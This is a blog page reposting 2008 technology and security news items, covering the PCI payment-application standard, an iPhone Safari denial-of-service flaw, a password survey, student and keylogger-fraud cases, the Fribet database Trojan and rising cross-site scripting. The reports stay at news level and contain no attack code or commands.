Group releases credit-card software standard

The PCI Security Standards Council announced on Tuesday an updated version of its security standards for applications that process credit-card transactions, aiming to prevent data breaches such as those at Hannaford Bros. and the TJX Companies.

Known as the Payment Application Data Security Standard (PA-DSS), the compliance effort will allow the Council to become a "one-stop shop" for merchants who want to search for applications and services that will not increase their exposure to attacks, a PCI Security Standards Council spokesperson said. Version 1.1 of the standard (pdf) will make certain that payment applications do not store sensitive data, such as the information typically stored on the magnetic stripe on the back of credit and debit cards

"Having a single source of information on approved payment applications and security assessors provides business value to merchants and service providers and allows them to make informed choices regarding the security of their payment application," Bob Russo, general manager for the PCI Security Standards Council, said in a statement announcing the new standard.

The latest version of the application-security standard follows the revelation that online data thieves managed to make off with millions of credit- and debit-card numbers from grocery store chain Hannaford Bros. In 2007, retail giant TJX Companies also announced a large data breach, and by the end of the year, estimates of the size of the loss surpassed 100 million credit- and debit-card numbers. While TJX Companies had not complied with the PCI Data Security Standard, it is currently not known whether Hannaford Bros. had remained in compliance. According to Visa, about three-quarters of large companies and two-thirds of medium-sized firms had complied with the PCI's payment security standards by the end of 2007.

The PCI Security Standards Council plans to certify companies over the next year to be Payment Application Qualified Security Assessors (PA-QSAs). The application standard is based on Visa's Payment Applications Best Practices (PABP) requirements for its merchants.

Posted in | 0 comments

Fring Brings VoIP to Hacked iPhones

Fring, the company founded by Avi Shechter, the former co–CEO of ICQ and VP at AOL, has announced that it released a test version of its popular application which brings Skype, as well as MSN, Google Talk and AIM to Apple's iPhone.

"This special pre-release version of fring, developed in conjunction with the Holon Institute of Technology academic research labs is a direct response to iPhone users kicking our behind to get fring for their COOOOOL devices," the company said on its website.

"Part of the objective here (besides getting you all excited with fring for iPhone) is to get feedback prior to release of the full-feature version and create a truly superb user experience for iPhone users," Fring says.

The fring application is only available to those who jailbroke their iPhones or iPod Touches. The application is not endorsed by Apple which is against VoIP applications for its gadgets. This is the case because access to free calls could dramatically cut into the profit margins of the carriers licensed to supply the handset, and everything Apple does is about large profit margins (like its Mac desktop computers). Also, application runs in the background, which is forbidden by Apple.

Of course, the iPod Touch does not have a microphone so you need the Touchmods dock connector microphone.

Fring, also co-founded by Boaz Zilberman and Alex Nerst, is headquartered in Israel, and has representation in Italy, UK and Germany. In February, BusinessWeek reported that more than 100,000 new users from 160 countries were downloading, installing, and registering to use fring each month.

Posted in | 0 comments

iPhone vulnerable to DoS attack

A security firm claims to have uncovered a denial-of-service vulnerability in version 1.1.4 of Apple's Safari web browser for the iPhone.

Radware said that the phone is vulnerable to DoS attacks owing to a design flaw that may be triggered by a series of memory allocation operations on the dynamic memory pool, which in turn triggers a bug in the garbage collector.

"While vendors are struggling to push new products and applications, it is evident that security still remains a secondary concern," said Itzik Kotler, security operation centre manager at Radware.

"Hackers continue to misappropriate other people's software and their job is made easier by design flaws embedded into software products."

To exploit the vulnerability, an iPhone user must open an HTML page which contains JavaScript that manifests this vulnerability.

Once at the site, an application-level DoS attack crashes the Safari browser and could go as far as crashing the iPhone completely.

Users could be lured to sites containing this attack via links in spam messages or other social engineering techniques.

It is unclear whether the fault can cause any permanent damage to the phone or is simply a nuisance.

Posted in | 0 comments

Women love chocolate more than password security

Women are four times more likely than men to give out "passwords" in exchange for chocolate bars.

A survey by of 576 office workers in central London found that women are far more likely to give away their computer passwords to total strangers than their male counterparts, with 45 per cent of women versus ten per cent of men prepared to give away their login credentials to strangers masquerading as market researchers.

The survey, conducted outside Liverpool Street Station in the City of London, was actually part of a social engineering exercise to raise awareness about information security in the run-up to next week's Infosec Europe conference.

Infosec has conducted similar surveys every year for at least the last five years involving punters apparently handing over login credentials in exchange for free pens or chocolate rewards.

Little attempt is made to verify the authenticity of the passwords, beyond follow-up questions asking what category it falls under. So we don't know whether women responding to the survey filled in any old rubbish in return for a choccy treat or handed out their real passwords.

This year's survey results were significantly better than previous years. In 2007, 64 per cent of people were prepared to give away their passwords for a chocolate bar, a figure that dropped 21 per cent this time around.

So either people are getting more security-aware or more weight-conscious. And with half the respondents stating that they used the same passwords at home and work, then perhaps the latter is more likely.

Taken in isolation the password findings might suggest the high-profile HMRC data loss debacle had increased awareness about information security. However, continued willingness to hand over personal information that could be useful to ID fraudsters suggests otherwise.

The bogus researchers also asked for workers' names and telephone numbers, ostensibly so they could be entered into a draw to go to Paris. With this incentive 60 per cent of men and 62 per cent of women handed over their contact information. A similar percentage (61 per cent) were happy to hand over their dates of birth

Posted in | 0 comments

PBB Teen Editon Plus Scandal ( Beauty )

PBB Teen Editon Plus Scandal ( Beauty )




Posted in | 0 comments

Students hack into school computer system in western New York

WILLIAMSVILLE, N.Y. (AP) - Authorities say several current and former students broke into a school districtÂ’s computer system in western New York last month and copied secure files that included the personal information of employees.

The computer breach by Williamsville North High School students marks the third incident in the past month. Students in the Grand Island and West Seneca districts have been charged with unauthorized computer use.

Amherst Police Chief John Askey tells the Buffalo News that students overrode the security defenses of a classroom computer at Williamsville North and went trolling for information.

At least three individuals are suspected, and several more knew about it. Those involved have told police they simply were interested in how far they could get into the system.

Askey adds that several of the hackers are considered "very bright kids" and good students with no lengthy disciplinary records. It may take weeks to determine the extent of the breach.

Superintendent Howard Smith sent a letter this week to the districtÂ’s 1,800 employees, asking them to notify police if they uncover any suspicious credit card or banking activity.

Copyright 2008 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.

Posted in | 0 comments

Semiautonomous orbs rock Yuri's Night

MOUNTAIN VIEW, Calif.--Corey Fro is chasing a large metal orb across the pavement at the NASA Ames Research Center here. He is desperately trying to make sure that the orb doesn't crush a nearby robot.

The orb in question is being remotely directed by a kid wielding an Xbox-like wireless controller, but it's the kid's first time using the device, and he really doesn't have any idea what he's doing.

And that's why the orb has rolled away and is bearing down rapidly on the unsuspecting and defenseless robot a few yards away. In the end, Fro caught the wayward sphere and saved the day, or at least the innocent robot.

If this sounds unusual, it isn't. At least not at Yuri's Night, a 12-hour celebration of space, science, music, and art held at NASA Ames and other locations around the world Saturday in honor of Russian cosmonaut Yuri Gagarin's first flight into space.

The orb is part of Swarm, a project designed for Burning Man built around the concept of autonomous spheres that can be programmed to perform in one of many ways.

Or, as Fro put it, "They're kinetic sculptures that drive around in an autonomous but choreographed pattern."

Fro is just one of about 30 people who built the orbs for Burning Man 2007, and now the project is returning to Burning Man 2008 as an art piece partially funded--and therefore honored as noteworthy--by the curators of the annual countercultural arts festival.

But before it can go back out to the Nevada desert, Swarm had to make an appearance at Yuri's Night, and it was certainly one of the main attractions for the thousands in attendance Saturday.

And that's at least in large part because of what they can do.

"The orbs control their own movement, light show, and music," explained Fro. "The way they do that is by communicating with the mother node."

"The Swarm of autonomous beings by their very nature will have emergent and complex behavior," the project's Web site states. "They will flock, flirt, dance and interact, and their actions will surprise and astonish even us, their creators. They are simple, but together they will behave in ways more complex than we can predict."

The idea is that five of the six orbs--which look something like specialized see-through hubcaps turned into spheres with really expensive robotic controls and LEDs inside--are subservient to the desires of the lead orb, or mother node.

The only information the subservient orbs send out is GPS and accelerometer data, which they send to the lead orb, which, Fro said, uses that information to coordinate the movements and lighting effects of all the spheres.

"So the movement coordination allows it to follow the leader, drive in patterns or (even) make the orb representation of planetary systems," Fro said. "But once they're running under control of the mother node, there's no control from humans.

That means, once all the orbs are in motion--something that wasn't on display at Yuri's Night--the only way to stop them is direct the mother node to stop.


Each orb, Fro said, is driven by counterbalancing using the weight of lead-acid batteries as ballast. By swaying the ballast forward, the orb moves forward as the center of gravity changes.

"To turn right or left," Fro said, "we swing the ballast right or left."

At Burning Man, where the entire project, in its 2008 configuration, will be unfurled, the Swarm team plans to erect a mast on the open desert floor that projects a large laser circle on the ground.

The idea is to define a safety zone so that pedestrians, bicyclists, and those on other forms of conveyance are safe.

"If they walk into that circle," Fro said, "all bets are off."

I was very happy to see the orbs at Yuri's Night because Swarm was one of the legendary art projects I missed at Burning Man 2007. It was something I heard a lot of people talk about after the fact in very reverent terms.

And as befits many Burning Man art projects, the 2008 version is sure to be new and improved. In fact, Fro said, the Xbox-like controllers were a big part of what's new for this year: joysticks that can allow anyone to take very subtle control over the orbs.

But it's also very easy to lose control of them, as I saw multiple times on Saturday as Fro would hand the controller over to one person or another.

"Try not to rock it so much," he said to someone at one point, "because if you hit the kill switch, it will stop."

Posted in | 0 comments

Colombian cyber-crook jailed for nine years

A Colombian citizen has been sentenced to nine years in prison for a complex computer fraud which affected more than 600 people.

Mario Simbaqueba Bonilla, 40, was also sentenced to three years supervised release on his exit from prison, and ordered to pay restitution of $347,000.

Simbaqueba Bonilla pleaded guilty in January to charges of conspiracy, access device fraud and aggravated identity theft.

According to the charges Simbaqueba Bonilla, alone and in concert with a co-conspirator, engaged in a complex series of computer intrusions, identity thefts and credit card frauds designed to steal money from payroll, bank and other accounts.

The court recognised the attempted and actual loss from the scheme at $1.4m.

Much of the identity theft, initiated from computers in Colombia, targeted individuals residing in the US, including Department of Defense personnel.

Simbaqueba Bonilla used the money to buy expensive electronics and luxury travel and accommodation in various countries, including Hong Kong, Turks and Caicos, France, Jamaica, Italy, Chile and the US.

The man engaged in a conspiracy between 2004 to 2007 that began with illegally installing keystroke logging software on computers located in hotel business centres and internet lounges around the world.

This software collected the personal information of those who used the computers, including passwords and other identifying information used to access bank, payroll, brokerage and other accounts online.

Simbaqueba Bonilla used the data to steal or divert money into accounts he had created in the names of other people he had victimised in the same way.

Through a complex series of electronic transactions designed to cover his trail, Simbaqueba Bonilla transferred the stolen money to credit, cash or debit cards and had the cards mailed to himself and others at commercial mailing addresses.

Federal agents arrested Simbaqueba Bonilla when he flew into the US in August 2007.

At the time of his arrest, Simbaqueba Bonilla was flying on an airline ticket purchased with stolen funds, and had in his possession a laptop also purchased with stolen funds.

The laptop contained the names, passwords and other personal and financial information of more than 600 people.

Posted in | 0 comments

Database Trojan infests pro-Tibet websites

Security researchers have unearthed more details about a Trojan that targets backend databases as well as desktop clients.

The Fribet Trojan has been planted on pro-Tibet websites, possibly using a Vector Markup Language flaw (MS07-004) patched by Microsoft early last year. When visitors to the pro-Tibet websites are infected, the Fribet Trojan creates a backdoor on compromised hosts.

In addition, the Trojan loads a "SQL Native Client" ODBC library that's designed to execute arbitrary SQL statements received from a command and control server. The feature provides the ability to run arbitrary SQL commands from compromised machines onto connected database servers. This functionality allows hackers to steal data or modify databases, providing they are able to log onto these databases in the first place.

The attacker still needs to find out the host name, database name, username and password. However, monitoring functions included with Fribet as well as easily-guessable weak and default values might leave the door open for hackers, net security firm McAfee reports.

The Fribet Trojan emerges little more than a month after SQL injection attacks, which inserted iFrame links to sites hosting exploit scripts and malware on legitimate websites.

Unlike those attacks, the Fribet Trojan can be used against the attack sites protected against conventional SQL injection attacks. McAfee researchers Shinsuke Honjo and Geok Meng Ong explain.

"This Trojan apparently can be used as an alternate to SQL Injection attacks, but in a more direct way," they write. "Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure database backends are equally secure to defend against such a penetration vector.

Posted in | 0 comments

Hackers exploit poor website code

Web designers making very old mistakes are letting malicious hackers hijack visitors to their sites, say experts.

Many of the loopholes left in the code created for websites have been known about for almost a decade say the security researchers.

The poor practices are proving very attractive to hi-tech criminals looking for a ready source of victims.

According to Symantec the number of sites vulnerable in this way almost doubled during the last half of 2007.

Wholly vulnerable

Kevin Hogan, director of security operations at Symantec, said the bug-ridden web code was putting visitors to many entirely innocent sites at risk.

"It overturns the whole notion that if you stay away from gambling and porn sites you are okay," he said.

The attack that a malicious hacker can carry out via these web code vulnerabilities is known as cross-site scripting (abbreviated as XSS).

Typically these involve lax control of the data being swapped between a web server and the browser program someone is using to interact with it.

An XSS vulnerability could, for instance, allow attackers to steal the login credentials of a visitor to a site.

Mr Hogan said more and more attackers were looking for websites that were vulnerable to these scripting attacks because they required little work to mount.

By contrast, said Mr Hogan, a phishing attack required the creation of tempting e-mails, fake servers and dead-drops to gather data.

In its most recent Internet Security Threat Report Symantec identified 11,253 specific XSS vulnerabilities in the last six months of 2007. Six months earlier the count stood at 6,961.

Symantec said there were likely many more that had not reported vulnerabilities.

Drawing its data from XSSED which gathers data on these vulnerabilities, Symantec said only 473 of these loopholes had so far been fixed.

Website administrators had a poor record of closing loopholes, it said.

"Attackers..., can expect that [a] site maintainer will not address the vulnerability in a reasonable amount of time, if at all," said the report.

"There are a lot more websites out there that are prone to this," said Mr Hogan. "It's a much bigger proposition to make a safe website than it is to patch a browser."

Chris Wysopal, co-founder and chief technology officer at Veracode which produces online tools that scan code for security flaws, said the problem was getting worse.

"I do not see trends slowing this down," he said.

XSS attacks were becoming more popular because more and more websites were writing their own snippets of code so visitors could get more out of a site, he said.

Unfortunately, he added, the same mistakes were being made in this custom code years after they were first discovered.

"The problem was identified eight years ago or so," he said. "Over time attackers have figured out better and more interesting things to do with cross-site scripting."

He added: "It's such a target rich environment I do not think the attackers need to have a very sophisticated way to harvest sites for vulnerabilities."

Automated web tools were available that can scan custom web code and highlight vulnerabilities but few web designers used them, said Mr Wysopal.

"The awareness is not there that if you write code you need to test it before you put it out there," he said.

Posted in | 0 comments